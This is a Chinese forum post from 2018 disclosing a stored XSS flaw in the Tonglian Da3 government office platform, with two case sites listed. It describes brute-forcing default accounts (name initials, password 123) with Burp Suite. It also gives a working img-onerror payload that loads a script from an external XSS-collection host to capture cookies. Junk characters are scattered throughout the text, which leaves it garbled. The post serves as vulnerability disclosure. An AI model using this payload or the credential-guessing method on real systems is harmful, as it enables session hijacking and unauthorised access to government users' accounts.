, s c! T; c5 X* p
3 L4 J' J9 P! Y, W. m$ L 同联Da3协同办公平台后台通用储存型xss漏洞, f+ e! `6 N# x. H; J5 Y* v0 ?" A X
/ r+ j0 k% h7 i& O) O& i
% a. {# l: W' I8 @
平台简介:/ K/ W$ T' ^$ l# G6 ~, v+ @
5 z5 P* s1 E$ z. X0 V2 f . x- s9 ?: f8 t$ b- U6 s; Z. G1 m
& ]/ a+ w; s8 A
$ {6 v* y0 ~7 n3 T; m0 ?6 S
# C' m6 r8 B v- G5 a 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; Q) v& ~6 ^# k6 E1 Q5 T
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 O% G* f O' u
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!, l2 p: |/ x3 r$ I8 L1 r
! T7 y H8 p/ U3 J7 k ! U" p: P( |) ~. z) p* Q
- Y c$ X' S5 I A, w6 m6 a8 P2 j
% y, y9 q) @& n# g. E3 F. |& q
. O( D9 c) O d1 d% J 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:. j% p8 r6 e( L B S5 D
( [- ]& {6 G% g/ H! _5 }
+ [$ v) _. j# U5 t) c: U ) ]2 O2 g6 p* v `; {
, y i ?0 \( o* U- v: r( k
- t+ ?: O, G5 a* l8 E |9 G5 W6 ~ http://1.1.1.1:7197/cap-aco/#(案例2-)
/ I# `9 r: V- y8 @$ Q
- c0 e/ l3 P) k8 x/ F
$ ?+ G# h& w) x- F1 _9 R! f0 @. x
http://www.XXOO.com (案例1-官网网站)
: v9 e- O2 q- j9 J
7 [# h6 w8 j$ ]
, ^' ?4 q2 Q5 { g 漏洞详情:5 \0 J" F- l2 y
3 X; M# _: R, {+ X8 X3 T% ?, e
& e. z' k5 _( s; f
案例一、
" T9 U2 ^# t5 L
" A& j# y/ [2 Z. v, |. U1 w 3 i) m% d- W* Z% S: U/ w
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
; z4 `( g t; ^& m b% h
% q3 K( u2 ~; c/ l
m% ]' s4 q9 ^$ i- H 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:, w2 ~1 @3 C2 `
! h3 N6 X' j1 K: t9 A9 f5 ^0 z 5 n) P7 {/ }$ o7 m- w. n! a
) o, |. q" f' x% E: I
& _# \: Q: M$ r* S ; c' d6 N9 n/ n. a4 n2 m
/ B8 b0 P- z( l3 O7 K
& x5 K6 f) N# A G
% v& ]4 [4 K; I& x status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
, p- ]! Y Z* r l
7 A/ l; `1 Y3 c" j7 K: i
& L5 H& v4 V1 ?
1 V! R* E1 [9 b5 f; }6 u& \
6 a, l. h, K" t0 C7 W5 z/ d& c9 _
; K) |* c8 z2 W 
' f! ^) K) X* n# M) K
( Z) o- b" o' |6 |% ^
b3 F; u4 a5 u, } 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 2 X: z' o+ n) }2 K6 l
1 e' Z6 [7 m: f3 s' ] ' Y$ L0 {. _7 o8 N8 o! T
% n8 S% c! @# D' g8 ^! d
5 y0 R- T! k+ S
8 U$ R) B8 n# n6 u
<img src=x
) n n5 n6 Z% y8 Y& `onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: & X V3 K7 B; O: I* U M
/ _3 p5 J- b1 i
% ^8 h2 |+ T! u# E% q
6 E+ f. T% L( G' t
* \: f5 a/ Z! S3 t6 G
0 X$ J8 |/ j4 k/ D# ]- r 然后发送,接收cookie如图: . p' o5 q' l$ h8 I1 x
2 Y: o( b4 g" ~/ l! }: d2 l/ I6 x* F ! s9 ~4 n1 y( h
6 |& N U0 a1 H: K! S+ S
* c; R; @. w$ o/ p: }- N) X& C! g8 r
* F: h. {3 w8 D. f
& q1 z$ t# h3 q8 t# `+ O
" e3 {! N& n1 u2 k1 L
2 o$ \, ~6 z/ J" N# X 4 l9 h. B3 D! S3 U4 C7 J7 m
: n/ |$ O0 C! j3 F6 a0 m' I
* N9 P" J% Q8 [9 j ( y o6 N/ ~8 h# p( T. F" l' X3 U7 h
3 s1 |$ Y" r4 t0 j, U5 V( ~/ p ' q3 |" e# ^: C* r" n% s
1 L4 W: x. }: t2 {, ~2 g
. _( w3 X% m! X9 X$ E3 @ @/ H' b
/ b6 j1 M8 S* X* j& T3 f. h 
% l6 C, ^; L J% V3 n& J( Y
' y+ `5 C% Z6 Y5 G0 x. N
8 i$ b( }+ S, K 2 T! x2 F D x7 { {
& I5 m$ e% j2 b" p. m
8 h( v) G$ G& s3 z
案例2、 ' |" H: y0 k! x0 D
, u0 h/ K' x: r$ W9 @ & c& A7 Q) q! V5 S# m6 ?0 P
前面步骤都一样,下面看效果图: ( e: `# Y/ {% ~' S' L
) P' N$ T% t9 r , L, e1 ]5 _8 Z" j
! h F3 |+ u' }2 d5 G" L
* |8 T9 D: h+ w
7 W6 N# B R9 p0 |( g5 a 
# p% c, \0 N9 K; y9 H
, ?# p5 w4 c5 |0 i* K2 S5 W* ]& g 2 N2 r6 i$ ~( L1 i5 P2 _, T# z
9 |/ Z- J0 v. I. [
4 U& z+ Z" F; ^3 o6 c/ u/ v6 E
; J: C1 K# }" I9 d) t
M* `7 N( g6 Y& h9 Y
6 }/ S3 R1 _; U- g ( ^# D3 m2 i2 u: h/ t* ~
4 Z* l; K+ [* `+ M _
$ J: J/ r1 }, B5 t2 I
$ R6 G9 ?$ s9 ~6 T
& p) @3 z& F; `7 V
+ B3 a& O- Q& j* b( T: D
0 y" o7 M( N7 ]# _6 J; [ \) ]% Q q6 p. V
+ E7 }) `7 c6 J( g
8 V( X, @/ _6 {# s ( R H$ [/ y( b N: b1 @& b
, s% ?2 A3 x- t& ?# A6 v- Z
- {! f- u8 @- x7 [' N* M
8 t8 |/ E* V( p9 W* p+ J5 R
5 h+ Y; m0 o; y1 D; @' z* T% m 
发表于 2018-10-20 20:14:15
收藏
支持
反对